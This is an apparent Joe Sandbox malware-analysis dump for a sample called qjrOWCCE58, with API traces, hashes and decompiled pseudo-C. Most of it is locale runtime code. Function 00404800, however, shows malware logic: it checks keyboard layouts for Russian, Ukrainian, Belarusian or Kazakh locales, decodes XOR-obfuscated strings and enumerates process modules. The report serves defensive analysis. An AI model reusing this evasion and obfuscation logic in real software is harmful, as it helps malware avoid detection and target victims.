0x00000000
0x00425d37
0x00425d3a
0x00425d40
0x00000000
0x00000000
0x00000000
0x00425d40
0x00425d46
0x00425d48
0x00000000

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00426019,00000002,00000000,?,?,?,00426019,?,00000000), ref: 00425D94
GetLocaleInfoW.KERNEL32(00000000,20001004,00426019,00000002,00000000,?,?,?,00426019,?,00000000), ref: 00425DBD
GetACP.KERNEL32(?,?,00426019,?,00000000), ref: 00425DD2

Strings

OCP, xrefs: 00425D4F
ACP, xrefs: 00425D19

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 60886cc7b99d093a3374cfccafcad39d750045da0f6f28414d5a2b94d97d9b8d
Instruction ID: 8fa92273d307a35ea35f9eb0b47c65e851db24f7f2748db159c9c67eae0b3e85
Opcode Fuzzy Hash: 60886cc7b99d093a3374cfccafcad39d750045da0f6f28414d5a2b94d97d9b8d
Instruction Fuzzy Hash: 8221FB32720920A6D7358F14E909B9B73A7EF54F60BD6C466E80AD7210E736DD41C758

Uniqueness

Uniqueness Score: -1.00%

Function 00845F62 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00846280,00000002,00000000,?,?,?,00846280,?,00000000), ref: 00845FFB
GetLocaleInfoW.KERNEL32(00000000,20001004,00846280,00000002,00000000,?,?,?,00846280,?,00000000), ref: 00846024
GetACP.KERNEL32(?,?,00846280,?,00000000), ref: 00846039

Strings

OCP, xrefs: 00845FB6
ACP, xrefs: 00845F80

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 60886cc7b99d093a3374cfccafcad39d750045da0f6f28414d5a2b94d97d9b8d
Instruction ID: ed0d01aa82fb81d78b0086adbba6174e42db1e96d6c4323cf270524fa428d3a1
Opcode Fuzzy Hash: 60886cc7b99d093a3374cfccafcad39d750045da0f6f28414d5a2b94d97d9b8d
Instruction Fuzzy Hash: BE21D332B0090DEBDB348F55C901BAF73A6FB64B54B568025E80AE7102FB32DE40C752

Uniqueness

Uniqueness Score: -1.00%

Function 008457D6 Relevance: 7.8, APIs: 5, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0083B59A: GetLastError.KERNEL32(00821CDF,?,00821CE3,008320B8,?,00821CDF,0042C0B4,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B59F
Part of subcall function 0083B59A: SetLastError.KERNEL32(00000000,0043B1C8,000000FF,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B63D

GetACP.KERNEL32(?,?,?,?,?,?,0083A19A,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00845897
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0083A19A,?,?,?,00000055,?,-00000050,?,?), ref: 008458C2
_wcschr.LIBVCRUNTIME ref: 00845956
_wcschr.LIBVCRUNTIME ref: 00845964
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00845A25

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 4147378913-0
Opcode ID: 6e0978f98c709dbe72242619dcdd891e131b569b0c2e2cfa85a1772262fb7790
Instruction ID: 4234d98e9ac3b5129780237c459fa7645754c17c0f8f3922b4bc10c491c815a4
Opcode Fuzzy Hash: 6e0978f98c709dbe72242619dcdd891e131b569b0c2e2cfa85a1772262fb7790
Instruction Fuzzy Hash: B571E631600B09ABD725AB79DC42BAF77A8FF58710F14403AF905DB182FB74E94087A1

Uniqueness

Uniqueness Score: -1.00%

Function 00425ED0 Relevance: 7.7, APIs: 5, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00425ED0(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x43b054; // 0x41d6575c
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E0041B333(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E0041B333(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x4309d4; // 0x17
					E00425E6F(_t89, 0, 0x4308c0, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E00425811(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E004258F7(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E00425CFB(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E0040D3AF(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t101;
							}
							E0041D0EF(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E0041D0EF(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E00411B28(_t38, _t101, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x4308bc; // 0x41
						_t75 = E00425E6F(_t89, _t97, 0x4305b0, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E004258F7(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E0042585C(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E0042585C(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}

0x00425ed8
0x00425edf
0x00425ee6
0x00425eea
0x00425eee
0x00425efc
0x00425f01
0x00425f02
0x00425f03
0x00425f04
0x00425f0c
0x00425f0e
0x00425f14
0x00425f1a
0x00425f1d
0x00425f1f
0x00425f22
0x00425f26
0x00425f2d
0x00425f3a
0x00425f3f
0x00425f42
0x00425f45
0x00425f45
0x00425f47
0x00425f4a
0x00425f4e
0x00425fbe
0x00425fc0
0x00425fc2
0x00425fd5
0x00425fd5
0x00425fdc
0x00425fe2
0x00425fe5
0x00000000
0x00425fe5
0x00425fc4
0x00425fc7
0x00000000
0x00000000
0x00425fcd
0x00425fd2
0x00000000
0x00425f55
0x00425f55
0x00425f59
0x00425f6b
0x00425f6f
0x00425f74
0x00425f78
0x00425f79
0x00426001
0x00426001
0x00426003
0x0042600f
0x00426019
0x0042601d
0x0042601f
0x00425ff0
0x00425ff0
0x00425ff2
0x00426000
0x00426000
0x00426025
0x0042602b
0x0042602d
0x00000000
0x00000000
0x00426034
0x0042603a
0x0042603c
0x00000000
0x00000000
0x0042603e
0x00426041
0x00426043
0x00426045
0x00426045
0x00426056
0x0042605b
0x0042605d
0x004260bd
0x004260bf
0x00000000
0x004260bf
0x00426062
0x0042606c
0x0042607c
0x00426082
0x00426084
0x00000000
0x00000000
0x0042608c
0x0042609b
0x004260a1
0x004260a3
0x00000000
0x00000000
0x004260ad
0x004260b5
0x00000000
0x004260ba
0x00425f7f
0x00425f8e
0x00425f93
0x00425f98
0x00425fe8
0x00425fe8
0x00425fe8
0x00425fea
0x00425fee
0x00000000
0x00000000
0x00000000
0x00425fee
0x00425f9a
0x00425f9c
0x00425fa0
0x00425fb2
0x00425fb6
0x00425fbb
0x00425fbb
0x00000000
0x00425fbb
0x00425fa2
0x00425fa5
0x00000000
0x00000000
0x00425fab
0x00000000
0x00425fab
0x00425f5b
0x00425f5e
0x00000000
0x00000000
0x00425f64
0x00000000
0x00425f64

APIs

Part of subcall function 0041B333: GetLastError.KERNEL32(00401A78,?,00401A7C,00411E51,?,00401A78,761B5970,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B338
Part of subcall function 0041B333: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B3D6

Part of subcall function 0041B333: _free.LIBCMT ref: 0041B395
Part of subcall function 0041B333: _free.LIBCMT ref: 0041B3CB

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00425FDC
IsValidCodePage.KERNEL32(00000000), ref: 00426025
IsValidLocale.KERNEL32(?,00000001), ref: 00426034
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0042607C
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0042609B

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: ca67a70ff635209d9443087bb4278fd035643946332ef32a4d90fb2e93ec0c85
Instruction ID: 159ec4411e2f9d0eefe775aa63f2feaa2d0f5c7105b062ff1f0e52be78efd064
Opcode Fuzzy Hash: ca67a70ff635209d9443087bb4278fd035643946332ef32a4d90fb2e93ec0c85
Instruction Fuzzy Hash: 2651B671B006259BDB10EFA5DD41BBFB3B8AF08304F95402BF911E7291E7789940CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00846137 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0083B59A: GetLastError.KERNEL32(00821CDF,?,00821CE3,008320B8,?,00821CDF,0042C0B4,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B59F
Part of subcall function 0083B59A: SetLastError.KERNEL32(00000000,0043B1C8,000000FF,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B63D

Part of subcall function 0083B59A: _free.LIBCMT ref: 0083B5FC
Part of subcall function 0083B59A: _free.LIBCMT ref: 0083B632

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00846243
IsValidCodePage.KERNEL32(00000000), ref: 0084628C
IsValidLocale.KERNEL32(?,00000001), ref: 0084629B
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 008462E3
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00846302

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: ca67a70ff635209d9443087bb4278fd035643946332ef32a4d90fb2e93ec0c85
Instruction ID: 49d58a396259bc736c7332b847fe0db3e921fc12fc129bcbcf6cb5109801aa8e
Opcode Fuzzy Hash: ca67a70ff635209d9443087bb4278fd035643946332ef32a4d90fb2e93ec0c85
Instruction Fuzzy Hash: 8E517F72A0022DABEF20DFA4DC41ABEB7B8FF49700F144569E914E7191E7B09910CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00404800 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 218
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E00404800(void* __ebx, void* __eflags) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				long _v52;
				char _v68;
				char _v69;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				int _v108;
				signed int _v132;
				char _v272;
				char _v276;
				char _v280;
				char _v382;
				short _v384;
				int* _v400;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t86;
				signed int _t87;
				intOrPtr _t90;
				intOrPtr _t99;
				signed int _t105;
				short _t107;
				signed int _t112;
				signed int _t118;
				intOrPtr _t123;
				signed char _t124;
				signed char* _t125;
				void* _t130;
				int _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t137;
				intOrPtr _t138;
				intOrPtr _t139;
				int _t143;
				void* _t147;
				signed int _t155;
				int _t156;
				void* _t157;
				char* _t159;
				signed int _t169;
				intOrPtr* _t170;
				signed char _t176;
				long _t180;
				void* _t184;
				signed char* _t185;
				intOrPtr _t187;
				void* _t188;
				int* _t189;
				void* _t190;
				char _t191;
				void* _t192;
				intOrPtr _t193;
				void* _t195;
				void* _t196;
				intOrPtr _t197;
				signed int _t198;
				signed int _t199;
				void* _t200;
				void* _t201;
				signed int _t202;

				_push(0xffffffff);
				_push(0x42ad85);
				_push( *[fs:0x0]);
				_t201 = _t200 - 0x5c;
				_t86 =  *0x43b054; // 0x41d6575c
				_t87 = _t86 ^ _t198;
				_v20 = _t87;
				_push(__ebx);
				_push(_t191);
				_push(_t87);
				 *[fs:0x0] =  &_v16;
				_t155 = 0;
				_t159 =  &_v40;
				asm("xorps xmm0, xmm0");
				_v76 = 0;
				asm("movq [ebp-0x24], xmm0");
				_v32 = 0;
				E00404620(0, _t159);
				_v8 = 0;
				_t90 = _v36;
				_t187 = _v40;
				_v80 = _t90;
				if(_t187 == _t90) {
					L27:
					_t156 = 0;
					goto L28;
				} else {
					_v28 = 0x5d5d5b7c;
					_v24 = 0x2e404f47;
					_t197 =  *((intOrPtr*)( *[fs:0x2c]));
					_v84 = _t197;
					do {
						E0040A490(_t155,  &_v68, _t180, _t187, _t187);
						_v44 =  *((intOrPtr*)(_t187 + 0x18));
						_v8 = 1;
						_t123 =  *0x43ce9c; // 0x0
						if(_t123 >  *((intOrPtr*)(_t197 + 4))) {
							E0040D738(_t123, 0x43ce9c);
							_t201 = _t201 + 4;
							_t210 =  *0x43ce9c - 0xffffffff;
							if( *0x43ce9c == 0xffffffff) {
								_t18 =  &_v28; // 0x5d5d5b7c
								 *0x43ce6c =  *_t18;
								_t19 =  &_v24; // 0x2e404f47
								 *0x43ce70 =  *_t19;
								E0040DA4A( &_v68, _t210, 0x42b510);
								E0040D6EE(0x43ce9c);
								_t201 = _t201 + 8;
							}
						}
						_t124 =  *0x43ce73; // 0x0
						if(_t124 != 0) {
							 *0x43ce6c =  *0x43ce6c ^ 0x0000002e;
							 *0x43ce6d =  *0x43ce6d ^ 0x0000002e;
							 *0x43ce6e =  *0x43ce6e ^ 0x0000002e;
							 *0x43ce6f =  *0x43ce6f ^ 0x0000002e;
							 *0x43ce70 =  *0x43ce70 ^ 0x0000002e;
							 *0x43ce71 =  *0x43ce71 ^ 0x0000002e;
							 *0x43ce72 =  *0x43ce72 ^ 0x0000002e;
							 *0x43ce73 = _t124 ^ 0x0000002e;
						}
						_t125 = 0x43ce6c;
						_v108 = 0;
						_v92 = 0;
						_v88 = 0xf;
						_t23 =  &(_t125[1]); // 0x43ce6d
						_t185 = _t23;
						do {
							_t176 =  *_t125;
							_t125 =  &(_t125[1]);
						} while (_t176 != 0);
						_push(_t125 - _t185);
						E00402030( &_v108, 0x43ce6c);
						_t191 = _v68;
						_t180 = _v52;
						_v76 = _t155 | 0x00000001;
						_t156 = _v108;
						_t129 =  >=  ? _t156 :  &_v108;
						_t159 =  >=  ? _t191 :  &_v68;
						_t130 = E00402180(_t159, _t180, _t159,  >=  ? _t156 :  &_v108, _v92);
						_t201 = _t201 + 0xc;
						if(_t130 != 0xffffffff) {
							L11:
							_v69 = 1;
						} else {
							_t180 = _v52;
							_t159 =  >=  ? _t191 :  &_v68;
							_t147 = E00402180(_t159, _t180, _t159, 0x437a5c, 7);
							_t201 = _t201 + 0xc;
							_v69 = 0;
							if(_t147 != 0xffffffff) {
								goto L11;
							}
						}
						_v76 = _v76 & 0xfffffffe;
						_t131 = _v88;
						if(_t131 < 0x10) {
							L16:
							if(_v69 != 0) {
								L32:
								_t132 = _v48;
								__eflags = _t132 - 0x10;
								if(_t132 < 0x10) {
									L36:
									_t187 = _v40;
									_t156 = 1;
									L28:
									if(_t187 == 0) {
										L38:
										 *[fs:0x0] = _v16;
										_pop(_t188);
										_pop(_t192);
										_pop(_t157);
										return E0040D3AF(_t156, _t157, _v20 ^ _t198, _t180, _t188, _t192);
									} else {
										_push(_t159);
										E0040BB70(_t156, _t187, _v36, _t187, _t191);
										_t193 = _v40;
										_t202 = _t201 + 4;
										_t180 = (0x92492493 * (_v32 - _t193) >> 0x20) + _v32 - _t193 >> 4;
										_t99 = _t193;
										_t169 = ((_t180 >> 0x1f) + _t180) * 8 - (_t180 >> 0x1f) + _t180 << 2;
										if(_t169 < 0x1000) {
											L37:
											_push(_t169);
											E0040D5EF(_t193);
											goto L38;
										} else {
											_t193 =  *((intOrPtr*)(_t193 - 4));
											_t169 = _t169 + 0x23;
											if(_t99 - _t193 + 0xfffffffc > 0x1f) {
												E00411D17(_t156, _t169, _t180, __eflags);
												goto L40;
											} else {
												goto L37;
											}
										}
									}
								} else {
									_t65 = _t132 + 1; // 0x11
									_t159 = _t65;
									_t133 = _t191;
									__eflags = _t159 - 0x1000;
									if(_t159 < 0x1000) {
										L35:
										_push(_t159);
										E0040D5EF(_t191);
										_t201 = _t201 + 8;
										goto L36;
									} else {
										_t193 =  *((intOrPtr*)(_t191 - 4));
										_t169 = _t159 + 0x23;
										__eflags = _t133 - _t193 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											goto L40;
										} else {
											goto L35;
										}
									}
								}
							} else {
								_t137 = _v44;
								if(_t137 == 0x419 || _t137 == 0x422 || _t137 == 0x423 || _t137 == 0x43f) {
									goto L32;
								} else {
									_v8 = 0;
									_t138 = _v48;
									if(_t138 < 0x10) {
										goto L25;
									} else {
										_t49 = _t138 + 1; // 0x11
										_t159 = _t49;
										_t139 = _t191;
										if(_t159 < 0x1000) {
											L24:
											_push(_t159);
											E0040D5EF(_t191);
											_t201 = _t201 + 8;
											goto L25;
										} else {
											_t193 =  *((intOrPtr*)(_t191 - 4));
											_t169 = _t159 + 0x23;
											if(_t139 - _t193 + 0xfffffffc > 0x1f) {
												goto L40;
											} else {
												goto L24;
											}
										}
									}
								}
							}
						} else {
							_t42 = _t131 + 1; // 0x11
							_t159 = _t42;
							_t143 = _t156;
							if(_t159 < 0x1000) {
								L15:
								_push(_t159);
								E0040D5EF(_t156);
								_t191 = _v68;
								_t201 = _t201 + 8;
								goto L16;
							} else {
								_t156 =  *(_t156 - 4);
								_t169 = _t159 + 0x23;
								if(_t143 - _t156 + 0xfffffffc > 0x1f) {
									L40:
									E00411D17(_t156, _t169, _t180, __eflags);
									asm("int3");
									asm("int3");
									_push(_t198);
									_t199 = _t202;
									_t105 =  *0x43b054; // 0x41d6575c
									_v132 = _t105 ^ _t199;
									_push(_t193);
									_push(_t187);
									_t189 = _t169;
									_v400 = _t189;
									_v400 = _t189;
									_t107 =  *0x437a6c; // 0x3e
									asm("movq xmm0, [0x437a64]");
									_v384 = _t107;
									asm("movq [ebp-0x108], xmm0");
									E0040F2F0(_t189,  &_v382, 0, 0xfa);
									_t195 = OpenProcess(0x410, 0, _t180);
									__eflags = _t195;
									if(_t195 != 0) {
										_t118 =  &_v280;
										__imp__K32EnumProcessModules(_t195, _t118, 4,  &_v276); // executed
										__eflags = _t118;
										if(_t118 != 0) {
											__imp__K32GetModuleBaseNameA(_t195, _v280,  &_v272, 0x104); // executed
										}
									}
									FindCloseChangeNotification(_t195); // executed
									_t170 =  &_v272;
									 *_t189 = 0;
									_t189[4] = 0;
									_t184 = _t170 + 1;
									_t189[5] = 0xf;
									 *_t189 = 0;
									do {
										_t112 =  *_t170;
										_t170 = _t170 + 1;
										__eflags = _t112;
									} while (_t112 != 0);
									_push(_t170 - _t184);
									E00402030(_t189,  &_v272);
									_pop(_t190);
									__eflags = _v12 ^ _t199;
									_pop(_t196);
									return E0040D3AF(_t189, _t156, _v12 ^ _t199, _t184, _t190, _t196);
								} else {
									goto L15;
								}
							}
						}
						goto L47;
						L25:
						_t155 = _v76;
						_t187 = _t187 + 0x1c;
						_t197 = _v84;
					} while (_t187 != _v80);
					_t187 = _v40;
					goto L27;
				}
				L47:
			}

0x00404803
0x00404805
0x00404810
0x00404811
0x00404814
0x00404819
0x0040481b
0x0040481e
0x0040481f
0x00404821
0x00404825
0x0040482b
0x0040482d
0x00404830
0x00404833
0x00404836
0x0040483b
0x0040483e
0x00404843
0x00404846
0x00404849
0x0040484c
0x00404851
0x00404a65
0x00404a65
0x00000000
0x00404857
0x0040485d
0x00404864
0x0040486b
0x0040486d
0x00404870
0x00404874
0x0040487c
0x0040487f
0x00404883
0x0040488e
0x00404895
0x0040489a
0x0040489d
0x004048a4
0x004048a6
0x004048a9
0x004048ae
0x004048b6
0x004048bb
0x004048c8
0x004048cd
0x004048cd
0x004048a4
0x004048d0
0x004048d7
0x004048d9
0x004048e0
0x004048e7
0x004048ee
0x004048f5
0x004048fc
0x00404903
0x0040490c
0x0040490c
0x00404911
0x00404916
0x0040491d
0x00404924
0x0040492b
0x0040492b
0x00404930
0x00404930
0x00404932
0x00404933
0x0040493c
0x00404942
0x0040494a
0x00404950
0x0040495d
0x00404960
0x00404963
0x0040496b
0x0040496f
0x00404974
0x0040497a
0x004049a2
0x004049a2
0x0040497c
0x00404983
0x00404988
0x00404991
0x00404996
0x00404999
0x004049a0
0x00000000
0x00000000
0x004049a0
0x004049a6
0x004049aa
0x004049b0
0x004049e0
0x004049e4
0x00404ac0
0x00404ac0
0x00404ac3
0x00404ac6
0x00404aef
0x00404aef
0x00404af2
0x00404a67
0x00404a69
0x00404b06
0x00404b0b
0x00404b13
0x00404b14
0x00404b15
0x00404b23
0x00404a6f
0x00404a72
0x00404a75
0x00404a82
0x00404a85
0x00404a8e
0x00404aa1
0x00404aa3
0x00404aac
0x00404afc
0x00404afc
0x00404afe
0x00000000
0x00404aae
0x00404aae
0x00404ab1
0x00404abc
0x00404b24
0x00000000
0x00404abe
0x00000000
0x00404abe
0x00404abc
0x00404aac
0x00404ac8
0x00404ac8
0x00404ac8
0x00404acb
0x00404acd
0x00404ad3
0x00404ae5
0x00404ae5
0x00404ae7
0x00404aec
0x00000000
0x00404ad5
0x00404ad5
0x00404ad8
0x00404ae0
0x00404ae3
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ae3
0x00404ad3
0x004049ea
0x004049ea
0x004049f2
0x00000000
0x00404a19
0x00404a19
0x00404a1d
0x00404a23
0x00000000
0x00404a25
0x00404a25
0x00404a25
0x00404a28
0x00404a30
0x00404a46
0x00404a46
0x00404a48
0x00404a4d
0x00000000
0x00404a32
0x00404a32
0x00404a35
0x00404a40
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a40
0x00404a30
0x00404a23
0x004049f2
0x004049b2
0x004049b2
0x004049b2
0x004049b5
0x004049bd
0x004049d3
0x004049d3
0x004049d5
0x004049da
0x004049dd
0x00000000
0x004049bf
0x004049bf
0x004049c2
0x004049cd
0x00404b29
0x00404b29
0x00404b2e
0x00404b2f
0x00404b30
0x00404b31
0x00404b39
0x00404b40
0x00404b43
0x00404b44
0x00404b45
0x00404b49
0x00404b4f
0x00404b55
0x00404b5b
0x00404b68
0x00404b78
0x00404b80
0x00404b96
0x00404b98
0x00404b9a
0x00404ba5
0x00404bad
0x00404bb3
0x00404bb5
0x00404bca
0x00404bca
0x00404bb5
0x00404bd1
0x00404bd7
0x00404bdd
0x00404be3
0x00404bea
0x00404bed
0x00404bf4
0x00404bf7
0x00404bf7
0x00404bf9
0x00404bfa
0x00404bfa
0x00404c06
0x00404c0a
0x00404c14
0x00404c15
0x00404c17
0x00404c20
0x00000000
0x00000000
0x00000000
0x004049cd
0x004049bd
0x00000000
0x00404a50
0x00404a50
0x00404a53
0x00404a56
0x00404a59
0x00404a62
0x00000000
0x00404a62
0x00000000

APIs

Part of subcall function 00404620: GetKeyboardLayoutList.USER32(00000400,?,41D6575C), ref: 004046B8
Part of subcall function 00404620: GetLocaleInfoA.KERNEL32(?,00000002,?,000001F4), ref: 004046ED

Part of subcall function 0040D738: EnterCriticalSection.KERNEL32(0043C4FC,?,?,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D743
Part of subcall function 0040D738: LeaveCriticalSection.KERNEL32(0043C4FC,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D780

__Init_thread_footer.LIBCMT ref: 004048C8

Part of subcall function 0040D6EE: EnterCriticalSection.KERNEL32(0043C4FC,?,?,004048CD,0043CE9C), ref: 0040D6F8
Part of subcall function 0040D6EE: LeaveCriticalSection.KERNEL32(0043C4FC,?,004048CD,0043CE9C), ref: 0040D72B
Part of subcall function 0040D6EE: RtlWakeAllConditionVariable.NTDLL ref: 0040D7A2

Strings

|[]], xrefs: 0040485D
|[]]GO@., xrefs: 004048A6
GO@., xrefs: 00404864

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInfoInit_thread_footerKeyboardLayoutListLocaleVariableWake
String ID: GO@.$|[]]$|[]]GO@.
API String ID: 960455753-2383573185
Opcode ID: 29e1ccf3adeb308813968e5959d09277629ce49d9a9e38ce8b329b1c052a1268
Instruction ID: 53c9be03fa07dd78ef9a38b54548f2183ae15eee9a167abb2ee8f7d2f770dd8b
Opcode Fuzzy Hash: 29e1ccf3adeb308813968e5959d09277629ce49d9a9e38ce8b329b1c052a1268
Instruction Fuzzy Hash: BD81D4B1E102588BDB18DFA8D88579EBBB0EF49314F18023AE505B73D2D778A944CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00824A67 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 218COMMON

Download Yara Rule

APIs

Part of subcall function 00824887: GetKeyboardLayoutList.USER32(00000400,?,0043B054), ref: 0082491F
Part of subcall function 00824887: GetLocaleInfoA.KERNEL32(?,00000002,?,000001F4), ref: 00824954

Part of subcall function 0082D99F: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D9AA
Part of subcall function 0082D99F: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D9E7

__Init_thread_footer.LIBCMT ref: 00824B2F

